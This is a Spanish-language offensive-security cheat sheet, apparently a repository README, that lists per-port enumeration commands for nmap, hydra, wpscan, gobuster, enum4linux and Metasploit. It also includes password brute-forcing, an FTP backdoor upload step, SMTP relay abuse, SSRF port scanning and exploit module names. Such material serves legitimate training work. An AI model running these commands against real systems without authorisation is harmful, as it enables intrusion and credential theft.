# Guía de trucos para Seguridad Ofensiva

Estoy compartiendo mi hoja de truco como una guía básica para la seguridad ofensiva y pentesting web (por el momento). Espero que les sea muy útil ya que es una compilación de recursos y materiales, metodologías, procedimientos, técnicas, entre otros, donde lo obtuve de muchas muchas fuentes. 

Voy a tratar de dedicarle tiempo para que sea lo más completo posible. Si falta algo sepan disculpar. El tiempo es limitado.

Esta es una de mis formas de aprender cosas. compartiendo conocimientos de ciberseguridad y piratería ética.

### Importante:

* Consulte recursos adicionales.
* No espere que cubra todas las técnicas, metodologías, teoría y el hacking ético general. (Ojala se pueda hacer jejeje, pero falta mucho y no es fácil). Paciencia!
* Nunca paren de aprender.
* Pueden haber algunos errores o partes incompletas. 
* Esta sección o sitio se ha realizado muy recientemente, no espere mucho en tan poco tiempo. Lo siento!!!.
* Tomar notas es muy importante.
* Trataré de abarcar todos los temas de hacking ético (No pregunten por toda la ciberseguridad porque es demasiado abarcativa).
* A medida que crece el repositorio puede ser que tenga que cambiar el formato de contenido, entre otros, para una mayor comprensión. 
* Si este sitio te ha sido útil, retuitea/sígueme a través de Twitter ([@ismabyte](https://twitter.com/@ismabyte)). puedes compartirlo, ya que podría ayudar a otros/as también =).
* Si necesitan más teoría busquen en google. (con google dork)
* Estoy diseñando el índice para que sea lo más entendible y completo posible, hay muchas secciones sin hacer. Gracias!!! 

> Les sirve para OSCP, Étichal Hacking, Pentesting general, OSINT, red team, Bug Bounty, CTF, Certificaciones, etc, etc…

---

# Índice

* OSINT (Inteligencia de código abierto)
* Pentesting
    * Red
        * Escaneo de puertos
            * Escaneo Inicial
	    * Hoja de truco Nmap
            * Hoja de truco masscan 
        * Enumeración de servicios   
            * Puerto 21 (FTP)
	        * Puerto 22 (SSH)
	        * Puerto 23 (Telnet)
	        * Puerto 25 (SMTP)
	        * Puerto 53 (DNS)
	        * Puerto 79 (FINGER)
	        * Puerto 80/443 (HTTP/HTTPS)
            * Puerto 110 (POP3)
	        * Puerto 111 (RPCINFO)
            * Puerto 119 (NTP)
            * Puerto 135 (MSRPC)
            * Puerto 139/445 (PYME)
            * Puerto 143 (IMAP)
            * Puerto 161/162 (UDP - SNMP)
            * Puerto 199 (SNMP)
	        * Puerto 389/636/3269 (LDAP)
	        * Puerto 1433/1434/1443 (MSSQL)
	        * Puerto 1721/500 (VPN)
	        * Puerto 3306 (MySQL)
	        * Puerto 5432 (PostgreSQL)
       
    * Web
        * Descubriendo recursos
        * API
    * Móvil
    * Linux
    * Windows
* Bug Bounty
* Red Team
* Cloud
* Inalámbrico
* Criptografía

---

# Pentesting

## Metodología General

Es una guía básica a tener en cuenta. -> más bonito en una imagen =) (profundizare mas cada una) 
 
1. OSINT
    * Fuente de información ->
    * Adquisición ->
    * Procesamiento ->
    * Análisis ->
    * Inteligencia ->
    * Requisitos -> 
2. Reconocimiento Pasivo
3. Reconocimiento Activo 
4. Ingenieria Social
5. Explotación (Ganando acceso) 
7. Post Explotación
7. Escalado de privilegios
8. Movimiento lateral
9. Mantener Acceso
10. Cubrir pistas (borrar)
11. Informe

---

# Pentest General

Aquí se detallan los comandos y las técnicas de Pentesting proporcionando una descripción general de alto nivel de comandos típicos.

## Enumeración/Escaneo de puertos

Cada uno tiene su forma de empezar con la enumeración de puertos/servicios, puede empezar desde lo básico hasta lo más avanzado. Dependiendo del objetivo se puede elegir entre uno u otro. Con la herramienta nmap está bien.

* Escaneo inicial

```
#Escanea todos los puertos. Es una buena opción para comenzar
└─$ nmap -p- --open -T5 -v -oG allPorts <ipTarget> -n

```
```
# Básico
└─$ nmap -T4 -p- -A <ipTarget>

```
```
#Escanea todos los puertos TCP pero toma mucho tiempo.
└─$ nmap -v -sS -p--A -T4 <ipTarget>

```
```
#Escanear todos los puertos TCP y UDP toma más tiempo que el anterior.
└─$ nmap -v -sU -sS -p- -A -T4 <ipTarget>

```
```
#Busca puertos UDP rápidos.
└─$ nmap -sU -v -oN udpPorts <ipTarget>

```
Captura banner/enumeración de servicios

```
# -sV abren puertos para información de servicio y versión. Los administradores del sistema pueden cambiar el mensaje de versión para disuadir o engañar a los atacantes.
└─$ nmap -sV -sT -A <ipTarget>

```
* Hoja de truco Nmap --> (profundizar como otro tema) 

Ejecutar con proxies. Tener en cuenta que los firewall (Si se activa pude cambian los resultados) bloquean la IP por consultas masivas (Fuzzing) de todo el Pentest en General, podemos utilizar para ser *anónimo* Proxychain o Privoxy con una red Tor. Es bueno tenerlo en cuenta. --> (profundizar como otro tema)

```
# Como ejemplo el proxies port 8118 (predeterminado) del sistema o podemos utilizar Burp Suit port 8080 y de Burp sale Proxi 8118 y tor 9050 para no tener el OS con proxies. 
└─$ nmap --script smb-vuln* -sV -v -p 445 <ipTarget> --proxies http://127.0.0.1:8118 #Ejemplo

#otro ejemplo con HYDRA podemos estar anonimo con proxychains como proxies. Antes de ejecutar hay que modificar el config de proxychains. (es otro tema)
└─$ proxychains hydra -t 1 -l root -P /home/Documentos/unix_passwords.txt <ipTarget> mysql

#scan varias máquinas. por ejemplo
└─$ proxychains nmap -p- -sT -T4 --top-ports 20 10.42.42.0/24 -oG 10.42.42.0 --open

#usando 2 Pivot, hay que configurar proxychains. por ejemplo
└─$ proxychains ssh -D 1081 user@IP_Network2

```

Visualizar categorías para script de nmap. (Ejemplos en cada puerto)

```
└─$ grep -r categories /usr/share/nmap/scripts/*.nse | grep -oP '".*?"' | sort -u

```
Script de nmap

> Ubicado en /usr/share/nmap/scripts

```
#Para visualizar todos 
└─$ cd /usr/share/nmap/scripts 

```
Por ejemplo:

1.
```
#Buscar scripts seguros en puerto 445
└─$ nmap -p 445 --script "vuln and safe" <ipTarget>

```
2.
```
#Ejecuta la secuencia de comandos SMB OS Discovery
└─$ nmap 192.168.0.1 --script=smb-os-discovery

```
3.
```
#Script de transferencia de DNS
└─$ nmap --script=dns-zone-transfer -p 53 ns2.example.com

```
4.
```
#Ver ayuda del script dns-zone-transfer
└─$ nmap --script-help dns-zone-transfer

```
—

* Enumeración de servicios 

### Puerto 21(FTP) -->(profundizar)

```
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd

```

Nmap
```
└─$ nmap -vvv -sC -p21 <ipTarget>

```

```
# Las comprobaciones de FTP de inicio de sesión anónimo y rebote se realizan de forma predeterminada mediante nmap con la opción -sC:
└─$ nmap --script ftp-* -p 21 <ipTarget>

```

```
#Podemos iniciar sesión y cargar backdoor
└─$ftp <ipTarget>
ftp> USER anonymous
ftp> PASS hola@byte.com
ftp> binary
ftp> upload path/file_name123.ext

```
Conexión del navegador

```
# Por ejemplo firefox usando URL
ftp://anonymous:anonymous@<ipTarget>

```

Descargar todos los archivos desde FTP

```
└─$ wget -m ftp://anonymous:anonymous@<ipTarget> #Descargar todo
└─$ wget -m --no-passive ftp://anonymous:anonymous@<ipTarget> #Descargar todo
└─$ wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@<ipTarget>

```
Archivos de configuración

```
ftpusers
ftp.conf
proftpd.conf

```
Conexión por Telnet

```
└─$ telnet -n <ipTarget> 21

```
Obtener el certificado FTP (si existe)

```
└─$ openssl s_client -connect <ipTarget>:21 -starttls ftp

```
Fuerza bruta Hydra

```
#Necesita nombre Usuario
└─$ hydra -t 1 -l {Username} -P {Passwordlist} -vV <ipTarget> ftp

```
Metasploit

```
#Próximo

```
---

### Puerto 22 (SSH) -->(profundizar)

SSH, Secure Shell o Secure Socket Shell, es un protocolo de red que brinda a los usuarios una forma segura de acceder a una computadora a través de una red no segura. Permite ejecutar comandos en la máquina remota y mover ficheros entre dos máquinas. Provee autenticación y comunicaciones seguras sobre canales inseguros.

Puerto predeterminado: 22
se puede reenviar a: 2221

```
PORT     STATE SERVICE VERSION
2221/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f64:f0:6e:c8:fd: (DSA)
|   2048 da:d1:d3:34:6a: (RSA)
|   256 19:8f:44:d6:db: (ECDSA)
|_  256 0e:c3:ef:08:da: (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

> Servidores SSH
>> * OpenSSH: OpenBSD SSH, enviado en BSD, distribuciones Linux y Windows desde Windows 10
>> * PuTTY: Implementación SSH para Windows.
>> * Dropbear: Implementación SSH para entornos con poca memoria y recurso de procesador, enviado en OpenWrt
>> * CopSSH: Implementación de OpenSSH para Windows.

Enumeración básica

```
#Banner
└─$ nc -vn <ipTarget> 22

```
NMAP

```
└─$ nmap -p 22 <ipTarget> -sC # Enviar scripts nmap predeterminados para SSH
└─$ nmap -p 22 <ipTarget> -sV # Recuperar versión
└─$ nmap -p 22 <ipTarget> --script ssh2-enum-algos # Recuperar algoritmos compatibles
└─$ nmap -p 22 <ipTarget> --script ssh-hostkey --script-args ssh_hostkey=full # Recuperar claves débiles
└─$ nmap -p 22 <ipTarget> --script ssh-auth-methods --script-args="ssh.user=root" # Comprobar métodos de autenticación

```
Clave SSH pública del servidor

```
└─$ ssh-keyscan -t rsa <IP> -p <PORT>

#id_rsa teniendo la clave
└─$ ssh -i id_rsa user@<ipTarget>

```

El usuario puede solicitar ejecutar un comando justo después de la autenticación antes de que se ejecute el comando predeterminado o el shell

```
└─$ ssh -v user@<ipTarget> id

```
Fuerza bruta Metasploit

```
msf> use scanner/ssh/ssh_enumusers

```
```
# https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
msf> use scanner/ssh/ssh_identify_pubkeys

```
```
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts <ipTarget>
msf5 auxiliary(scanner/ssh/ssh_login) > set threads 10
msf5 auxiliary(scanner/ssh/ssh_login) > set verbose true

use auxiliary/fuzzers/ssh/ssh_version_2
```

Fuerza bruta Hydra

```
└─$ hydra -l root -P /usr/share/wordlist/metasploit/unix_password.txt ssh://<ipTarget>:22 -t 4 -V

```
Fuerza bruta Medusa

```
medusa -h <ipTarget> -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh

```
Fuerza bruta ncrack

```
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://<ipTarget>

```

Métodos de autenticación

```
└─$ ssh <ipTarget>
└─$ ssh <ipTarget> -okexAlgorithms=+diffie-hellman-group1-sha1 
└─$ ssh <ipTarget> -okexAlgorithms=+diffie-hellman-group1-sha1 -c <clave>

```
Buscar exploit en Kali Linux

```
└─$ searchsploit OpenSSH 6.6.1p1

```

### Puerto 23 Telnet

Puerto predeterminado: 23

nmap

```
└─$ nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <ipTarget> 

```

```
## Banner
└─$ nc -vn <ipTarget> 23

```
Metasploit

```
podemos ejecutar "search telnet" y nos dará todos los exploit y scanner

>use auxiliary/scanner/telnet/telnet_version 
>use auxiliary/scanner/telnet/brocade_enable_login
>use auxiliary/scanner/telnet/telnet_encrypt_overflow  
>use auxiliary/scanner/telnet/telnet_ruggedcom

```

### Puerto 25 SMTP

Protocolo simple de transferencia de correo

Puerto predeterminado 25, 26, 465, 587 

```
PORT     STATE SERVICE VERSION
25/tcp   open  smtp    Postfix smtpd

```

```
#Banner
└─$ nc -vn <ipTarget> 25
└─$ nc -nvv <ipTarget> 25
└─$ telnet <ipTarget> 25

```
Nmap

```
└─$ nmap -p25 --script smtp-commands -vn <ipTarget> 25

└─$ nmap --script smtp-enum-users <ipTarget>

└─$ nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 <ipTarget>

```
Herramienta smtp-user-enum 

```
└─$ smtp-user-enum -M VRFY -U /SecLists/Usernames/Names/names.txt -t <ipTarget>

```

```
└─$ hydra -P {Password_list} <ipTarget> smtp -V

```
Metasploit

```
>use auxiliary/scanner/smtp/smtp_enum
>use auxiliary/scanner/smtp/smtp_version
>use exploit/windows/smtp/ypops_overflow1
>use exploit/unix/smtp/opensmtpd_mail_from_rce

# SMTP relay

>use auxiliary/scanner/smtp/smtp_relay
>set RHOSTS <IP or File>
>set MAILFROM <PoC email address>
>set MAILTO <your email address>
>run

# Send email unauth:

MAIL FROM:attack@admin.com
RCPT TO:Email@Destination_Domain.com
DATA
test

Recibido

```

### Puerto 53 DNS

Muestra la dirección IP de un dominio

```
└─$ host www.target.com

```
Ver nombres de servidores

```
└─$ host -t ns www.target.com

```
Muestra los registros txt del dominio

```
└─$ host -t txt www.target.com

```
Para ver archivos de listas de palabras 

```
└─$ cd /usr/share/seclists/Discovery/DNS/

```
Fuerza bruta

```
└─$ dnsrecon -d <ipTarget> -D /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t brt

```
Enumeración

```
└─$ dnsenum <ipTarget>

```

Transferencia 

```
# Escanear puerto 53 y prueba de transferencia
└─$ nmap --script=dns-transfer-zone -p 53 <ipTarget>

# dig +multi AXFR @ns1.insecuredns.com insecuredns.com 
└─$ dig axfr @IP domain.com

└─$ fierce -dns domain.com

```
Banner

```
└─$ dig version.bind CHAOS TXT @DNS

```
Nmap

```
└─$ nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <ipTarget>

└─$ nmap --script dns-srv-enum --script-args “dns-srv-enum.domain='<DNSipTarget>'”  
```

Metasploit

```
use auxiliary/scanner/dns/dns_amp
use auxiliary/gather/enum_dns

```

### Puerto 69 UPD TFTP/Bittorrent-tracker

Leer y escribir en servidores sin autenticación 

Namp

```
└─$ nmap -n -Pn -sU -p69 -sV --script tftp-enum <ipTarget>

#Mismas comprobaciones que en el puerto FTP 21.
└─$ nmap -p69 --script=tftp-enum.nse <ipTarget>

```

Metasploit

```
> use auxiliary/scanner/tftp/tftpbrute
> use auxiliary/admin/tftp/tftp_transfer_util

```

### Puerto 79 Finger

Banner

```
└─$ nc -vn <ipTarget> 79
echo "root" | nc -vn <ipTarget> 79

```
Nmap

```
└─$ nmap -vvv -Pn -sC -sV -p79 <ipTarget>

```
Enumerar usuarios

```
└─$ finger @<ipTarget>       #List users
└─$ finger admin@<ipTarget>  
└─$ finger user@<ipTarget> 

```
Mestasploit

```
> use auxiliary/scanner/finger/finger_users

```
```
#truco relé
└─$ finger user@host@victim
└─$ finger @internal@external

```

### Port 80/443 HTTP(s) --> (profundizar, muy extenso)

HTTP significa Protocolo de transferencia de hipertexto (seguro)

Puerto predeterminado 80(HTTP), 443(HTTPS)

```
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  ssl/https

```

```
#Banner
└─$ nc -v <ipTarget> 80 # GET / HTTP/1.0
└─$ openssl s_client -connect <ipTarget>:443 # GET / HTTP/1.0

```
Metodología Simple

> Vamos a atacar a un dominio o subdominio por lo tanto tenemos que hacer los mismo pasos para cada uno de los <ipTarget> nuevos encontrados

Identificamos tecnologías (wappalyzer en el navegador).
    Buscamos vulnerabilidades conocidas desde la versión de la tecnología
    Tecnologías conocidas y trucos para extraer información
    Escáneres especializados 

Iniciamos escáneres de propósito general. siempre algo se puede encontrar.

Comenzamos con las comprobaciones: robots.txt, sitemap.xml, crossdomain.xml, clientaccesspolicy.xml, errores 404, redirecciones 3XX, /.well-known/ escaneo SSL/TLS. Son paginas predeterminadas con información interesante.

Rastreamos la web para encontrar archivos, carpetas, parámetros, extensiones de archivos.

Realizamos Fuerza bruta de directorios y capetas. Burp suit tipo araña es muy bueno y a partir de los directorios encontrados se realiza fuerza bruta para cada nuevo directorio.

Comprobamos copias de seguridad.

Parámetros de fuerza bruta. es bueno saber si hay ocultos.

Identificar los puntos finales que acepten entrada de usuarios para buscar vulnerabilidades 


Verificación

    * Gobuster
    * Wfuzz
    * Ffuz
    * CMS (ejemplo Wordpress)
    * Escáneres (nikto/wpscan)
    * Fuerza bruta de credenciales conocidas
    * Campos de entrada inyección sql
    * campos de entrada inyección de sistema operativo (RCE)

Identificamos

```
└─$ whatweb -a 1 <ipTarget> #Stealthy
└─$ whatweb -a 3 <ipTarget> #Aggresive
└─$ webtech -u <ipTarget>
└─$ webanalyze -host https://<ipTarget> -crawl 2

```

Buscar exploit

```
#searchsploit <nombre_tecnolía>
└─$ searchsploit apache

└─$ searchsploit --nmap file.xml #Buscar vulnerabilidades dentro de un resultado de xml de nmap

```

Chequear WAF -->(profundizar)

```
AQUÍ MÁS ADELANTE

```
Listas de palabras

```
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/wfuzz/wordlist/general/common.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

```

Gobuster

```
└─$ gobuster dir --url=http://<ipTarget>/ --wordlist=/usr/share/seclists/Discovery/Web-Content/common.txt

#scan only for directory
└─$ gobuster dir -u http://<ipTarget>/ -t 15 -w /usr/share/dirb/wordlists/common.txt 

#Scan for directory, and files extension of php,txt or conf
└─$ gobuster dir -u http://<ipTarget>/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf

#ignore Certificate check  
└─$ gobuster dir -u https://<ipTarget>/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf -k 


```
sublist3r

```
#subdomain
└─$sublist3r -d <ipTarget> -t 100 

```
wfuzz

```
└─$ wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt --hc 404 http://<ipTarget>/FUZZ.txt

└─$ wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://<ipTarget>/api/FUZZ

#ver mas cd /usr/share/wordlists/dirbuster
└─$ wfuzz -c --hc=404 -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://<ipTarget>/FUZZ

#enumerar puertos internos con respuesta 404
└─$ wfuzz -c --hc=404 -z range,1-65535 http://<ipTarget>:8080/request_to=http://127.0.0.1:FUZZ

#enumerar puertos internos con respuesta 200
└─$wfuzz -c --sc=200 -z range,1-65535 http://<ipTarget>:8080/request_to=http://127.0.0.1:FUZZ


```
Ffuf

```
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<ipTarget>/FUZZ -mc all -c -v

└─$ ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://<ipTarget>/FUZZ

```
Wordpress

```
└─$ gobuster dir --url=http://<ipTarget>/ --wordlist=/usr/share/seclists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt

# proxy burp suite port 8080 y tor
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt -u http://<ipTarget>/FUZZ -x http://127.0.0.1:8080 -mc 200 -c -v

# Fuerza bruta de contraseña
└─$ hydra -L /home/listas/usrname.txt -P /home/lists/pass.txt localhost -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

#wpsan
└─$ wpscan --force update -e --url <ipTarget>

└─$ wpscan --url http://<ipTarget>/ --enumerate u,ap,tt,t

└─$ wpscan --url <ipTarget> --enumerate ap --enumerate u

└─$ wpscan --url <ipTarget> -e p,t,u --detection-mode aggressive &gt; wpscan.log 

#Scan for vulnerable plugins with API
└─$wpscan -e vp --plugins-detection aggressive --api-token API_KEY --url <ipTarget> 


#Nmap wordpress
└─$ nmap -p80 --script http-wordpress-users <ipTarget>

└─$ nmap -sV --script http-wordpress-users --script-args limit=50 <ipTarget>


```
Dirsearch

```
└─$ dirsearch --url=http://<ipTarget>/ --extensions=*

```
Dirb 

```
# Antiguo y lento 
└─$ dirb http://<ipTarget>/ -r

```

Generar una lista de palabras a partir del contenido web

```
└─$ cewl http://<ipTarget>/ > cewl.txt

```
Escaneo de vulnerabilidades automáticos

```
└─$ nikto --host http://<ipTarget>/
└─$ whatweb -a 4 <ipTarget>
└─$ wapiti -u <ipTarget>
└─$ W3af

```
CMS scanners

```
└─$ cmsmap [-f W] -F -d <ipTarget>

└─$ droopescan scan drupal http://<ipTarget> -t 32 #Drupal

└─$ joomscan --ec -u <ipTarget> #Joomla

```
```

Sniper

```
└─$ sniper -t <ipTarget> -m webscan 

```
Osmedeus

```
# recon y vulnerabilidades
└─$ osmedeus scan -f extensive -t <ipTarget>

```
Nmap scripts

```
# IIS
└─$ nmap -Pn -n -T3 -v -sV --version-intensity=5 -Pn -p 80 --script=http-iis-webdav-vuln <ipTarget>

# JBOSS (CVE-2010-0738)
└─$ nmap -Pn -n -T3 -v -sV --version-intensity=5 -Pn -p 80 --script=http-vuln-cve2010-0738 <ipTarget>

# PHP-CGI (CVE-2012-1823)
└─$ nmap -Pn -n -T3 -v -sV --version-intensity=5 -Pn -p 80 --script=http-vuln-cve2012-1823 <ipTarget>

# RCE Ruby on Rails (CVE-2013-0156)
└─$ nmap -Pn -n -T3 -v -sV --version-intensity=5 -Pn -p 80 --script=http-vuln-cve2013-0156 <ipTarget>

# WAF Detection
└─$ nmap -Pn -n -T3 -v -sV --version-intensity=5 -Pn -p 80 --script=http-waf-detect,http-waf-fingerprint <ipTarget>

# Check Heartbleed CVE-2014-0160
└─$ nmap -Pn -n -p 443 -v -T3 --script=ssl-heartbleed,ssl-enum-ciphers,ssl-known-key --script-args vulns.showall -sV --version-intensity=5 <ipTarget>

```
nuclei

```
# Objetivos
# Templates
└─$ nuclei -t exposures/configs/git-config.yaml -l urls.txt
└─$ nuclei -t cves/2021/ -l urls.txt
└─$ nuclei -t cves/2020/ -t exposed-tokens -t misconfiguration -l urls.txt

# Tags
└─$ nuclei -tags cve -u urls.txt
└─$ nuclei -tags config -t exposures/ -u urls.txt
└─$ nuclei -tags lfi,ssrf,rce -t cves/ -l urls.txt

# Workflows
└─$ nuclei -w workflows/wordpress-workflow.yaml -l wordpress_urls.txt
└─$ nuclei -w workflows/wordpress-workflow.yaml -w workflows/jira-workflow.yaml -l urls.txt

# Severity
└─$ nuclei -t cves/ -severity critical -l urls.txt
└─$ nuclei -t cves/ -t vulnerabilities -severity critical,high -l urls.txt

```

Descubrir nuevos parámetros

```
# Arjun
# lista de palabras: https://github.com/s0md3v/Arjun/tree/master/arjun/db

└─$ arjun -u https://api.example.com/endpoint -m POST

# Param-miner
# lista de palabras https://github.com/PortSwigger/param-miner/blob/master/resources/params

# Muy buen recurso de palabas https://wordlists.assetnote.io/

```
Criptografía

```
└─$ padbuster http://<ipTarget>/<encoding> 8 -cookies auth=<encoding> -encoding 0

# Cyberchef es una excelente herramienta basada en web que nos permitirá analizar y decodificar datos fácilmente. https://gchq.github.io/CyberChef/

```

### Port 88 Kerberos -->(profundizar)


En primer lugar, Kerberos es un protocolo de autenticación, no de autorización. En otras palabras, permite identificar a cada usuario, quien proporciona una contraseña secreta, sin embargo, no valida a qué recursos o servicios puede acceder este usuario. Kerberos se utiliza en Active Directory. En esta plataforma, Kerberos proporciona información sobre los privilegios de cada usuario, pero es responsabilidad de cada servicio determinar si el usuario tiene acceso a sus recursos. TCP/UDP

```
└─$ nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='{Domain_Name}'" <ipTarget>

└─$ nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} <ipTarget>

#Mestasploit
> use auxiliary/gather/kerberos_enumusers

> use auxiliar/admin/kerberos/ms14_068_kerberos_checksum

```

Shodan

```
port:88 kerberos

```
Se profundizará más cuando lleguemos a Active directory.

### Port 110 POP3

Puerto predeterminado: 110, 995 (ssl)

```
   110/tcp open pop3 Dovecot pop3d   

```
Banners/autenticación
```
└─$ nc -nv <ipTarget> 110

└─$ openssl s_client -connect <ipTarget>:995 -crlf -quiet

└─$ nc -vvv <ipTarget> 110

USER admin
PASS admin

USER root
PASS root

USER test
PASS test

#list all mails
LIST 

#Retrive the mail
retr mail_number

└─$ telnet <ipTarget>
USER test@<ipTarget>
PASS admin

# or:

USER test
PASS admin

# List all emails
list

# Retrieve email number 5, for example
retr 9


```

Nmap

```
└─$ nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 <ipTarget>

└─$ nmap -p110 --script pop3-brute <ipTarget>

# Retrieve POP3 server capabilities (CAPA, TOP, USER, SASL, RESP-CODES, LOGIN-DELAY, PIPELINING, EXPIRE, UIDL, IMPLEMENTATION)  
└─$ nmap -v -sV --version-intensity=5 --script pop3-capabilities -p T:110 <ipTarget>

# Fuerza bruta en las cuentas
└─$nmap --script pop3-brute --script-args pop3loginmethod=SASL-LOGIN -p T:110 <ipTarget>

└─$nmap --script pop3-brute --script-args pop3loginmethod=SASL-CRAM-MD5 -p T:110 <ipTarget>

└─$nmap --script pop3-brute --script-args pop3loginmethod=APOP -p T:110 <ipTarget>


```

Hydra

```
└─$ hydra -l {Username} -P {Passwordlist} -f <ipTarget> pop3 -V

```

Metasploit

```
> auxiliary/scanner/pop3/pop3_version

```

### Puerto 111 RPCINFO

Proporciona información entre sistemas basados ​​en Unix. Puerto utilizado con NFS, NIS o cualquier servicio basado en rpc.

Puerto predeterminado: 111/TCP/UDP, 32771 en Oracle Solaris

Nmap

```
└─$ nmap -v -p 111 --script=nfs* <ipTarget>

└─$ nmap -sSUC -p 111 <ipTarget>

#Escaneo con script rpcinfo en todos los hosts
└─$nmap -v -p 111 --script=rpcinfo <ipTarget> -oG rpcbind-info.txt

```
Shodan

```
port:111 portmap

```

```
└─$ rpcinfo -p <ipTarget>

└─$ rpcclient -U "USERNAME" <ipTarget>
rpcclient $> enumdomusers
rpcclient $> queryuser 0xrid_ID

    srvinfo
    enumdomusers
    getdompwinfo
    querydominfo
    netshareenum
    netshareenumall


```
Metasploit

```
>use auxiliar/escáner/nfs/nfsmount

```

Muestra los puntos de montaje disponible en la víctima

```
└─$ sudo showmount -e <ipTarget>

```
Monte la carpeta NFS "inicio" en el ~/inicio local. -o nolock evita el bloqueo de archivos.

```
└─$ sudo mount -o nolock,nfsvers=3<ipTarget>:/home ~/home/

```

### Puerto 119 (NTP)

Banners

```
# Using netcat
└─$ nc -nv <ipTarget> 119
LIST

# Using telnet
└─$ telnet <ipTarget> 119

```
Identificacion

```
# Using netcat
└─$ nc -nv <ipTarget> 119
LIST

GROUP group_name to display related messages

POST
From; test@knacki.fr
Newsgroups: group_name
Subject: Test

This is a test.

.

HEAD identity_article
ARTICLE identity_article
BODY identity_article

```

### Port 135 MSRPC

Nmap

```
└─$ nmap <ipTarget> --script=msrpc-enum

```
Metasploit

```
msf > use exploit/windows/dcerpc/ms03_026_dcom

# Detección de servicios del asignador de puntos finales
> use auxiliary/scanner/dcerpc/endpoint_mapper

# Descubrimiento de servicio DCERPC oculto
> use auxiliary/scanner/dcerpc/hidden

# Detección de interfaz de gestión remota
> use auxiliary/scanner/dcerpc/management

# Auditor de servicios TCP DCERPC
> use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor

```

enum4linux

```
# Verbose mode
└─$ enum4linux -v <ipTarget>

# Do everything
└─$ enum4linux -a <ipTarget>

# List users
└─$ enum4linux -U <ipTarget>

# Si ha logrado obtener credenciales, puede obtener una lista completa de usuarios independientemente de la opción Restringir anónimos
└─$ enum4linux -u administrator -p password -U <ipTarget>

# Get username from the defaut RID range (500-550, 1000-1050)
└─$ enum4linux -r <ipTarget>

# Get username using a custom RID range
└─$ enum4linux -R 600-660 <ipTarget>

# List groups
└─$ enum4linux -G <ipTarget>

# List shares
└─$ enum4linux -S <ipTarget>

# Realice un ataque de diccionario, si el servidor no le permite recuperar una lista compartida
└─$ enum4linux -s shares.txt <ipTarget>

# Extrae la información del sistema operativo usando smbclient, esto puede extraer la versión del paquete de servicio en algunas versiones de Windows
└─$ enum4linux -o <ipTarget>

https://github.com/cddmp/enum4linux-ng

```
Clienterpc

```
# Conexión anónima  (-N=no pass)
└─$ rpcclient -U “” -N <ipTarget>

# Conexión con el usuario
└─$ rpcclient -U “user” <ipTarget>

# Obtener información sobre el DC
└─$ srvinfo

# Obtener información sobre objetos como grupos (enum*)
enumdomains
enumdomgroups
enumalsgroups builtin

# Intente obtener la política de contraseñas de dominio
getdompwinfo

# Intente enumerar diferentes dominios de confianza
dsr_enumtrustdom

# ¿Obtener nombre de usuario para un usuario definido?
getusername

# Consultar información de usuarios, grupos, etc.
queryuser RID
querygroupmem519
queryaliasmem builtin 0x220

# Política de información de consulta
lsaquery

# Convertir SID a nombres
lookupsids SID

```

### Puerto 139/445 PYME -->(profundizar)

SMB significa bloque de mensajes del servidor

General

```
SMB1 => Win2000 / XP / 2003
SMB2.0 => Vista / 2008
SMB2.1 => Win7 / 2008R2
SMB3.0 => Win8 /  2012
SMB 3.02 => Win8.1 / 2012R2

# Configuration tips
# Can be usefull to configure /etc/samba/smb.conf with:
client min protocol = SMB2
client max protocol = SMB3

# Then
service smbd restart

```

Nmap

```
└─$ nmap --script "safe or smb-enum-*" -p 445 <ipTarget>

```

Identificar

```
# Port 139
# nbtscanhost para host/domain - nbtscan -h para mas ejemplos
└─$ nbtscan <ipTarget>

# Metasploit
>use auxiliary/scanner/smb/smb2
>set RHOST IP
>run

# Descubre la versión real de samba si está oculta   
└─$ ngrep -i -d tap0 ‘s.?a.?m.?b.?a.*[[:digit:]]’ & smbclient -L //<ipTarget>


#### Escaneo de servicios y recursos con Nmap


# Base nmap
└─$ nmap -v --script=xxxx -p T:139,445 <ipTarget>

# Hard nmap
└─$ nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08- 067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse <ipTarget>

